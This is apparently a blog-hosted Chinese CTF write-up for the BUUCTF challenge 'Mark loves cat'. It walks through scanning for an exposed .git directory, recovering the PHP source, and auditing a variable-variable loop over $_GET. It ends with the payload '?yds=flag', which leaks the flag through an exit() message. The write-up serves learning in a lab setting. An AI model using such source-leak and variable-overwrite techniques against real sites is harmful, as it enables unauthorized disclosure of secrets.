BUUCTF-[BJDCTF2020]Mark loves cat

对靶机进行目录扫描

发现有.git泄露

用githak提取.git文件

发现找到了两个文件

flag.php

利用$flag就可访问/flag文件

index.php

代码审计

perl 复制代码
echo "the flag is: ".$flag;

传入$flag就能获得flag

php 复制代码
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

要求get和post都不能有flag参数,就能传入$yds

php 复制代码
foreach($_GET as $x => $y){
    $$x = $$y;
}

当用get方式传入一个键值对的时候,能把键值分别转换为两个可变变量

当我们传入yds=flag时

通过这个foreach循环会变成yds=flag

构造payload

php 复制代码
?yds=flag
相关推荐
其实防守也摸鱼20 小时前
补天SRC新手入门指南:从0到1的漏洞挖掘之路
网络·python·学习·安全·web安全·数据挖掘·挖洞
我不是QI21 小时前
一、主持人信息(域名 网站资产情报搜集)原理解析
安全·网络安全
lubiii_21 小时前
网络安全法律法规备考速查手册
安全·web安全·网络安全
txg66621 小时前
网络安全领域简报(2026年7月14日—20日)
安全·web安全
2501_916008891 天前
HTTPS 抓包遇到证书绑定怎么办,使用 TraceEagle 解除 App 证书校验
网络协议·计算机网络·http·网络安全·ios·adb·https
treesforest1 天前
你以为只是一串数字?你的IP地址,正在悄悄暴露这些信息
网络·网络协议·tcp/ip·网络安全·ip归属地查询·ip风控
Увидимся вчера1 天前
绿盟堡垒机5611版本—自动改密
网络安全
难寻安逸1 天前
DVWA-使用sqlmap 进行sql注入过程
数据库·sql·网络安全
HackTwoHub1 天前
解锁 AI 红队全新玩法!Claude-Red 攻防 Skill 库,内置 SQLi、XXE、文件上传等 Web 专项 Skill,一键导入快速落地渗透实战
前端·人工智能·web安全·网络安全·自动化·系统安全
见青..2 天前
phpMyAdmin权限提升
web安全·网络安全·phpmyadmin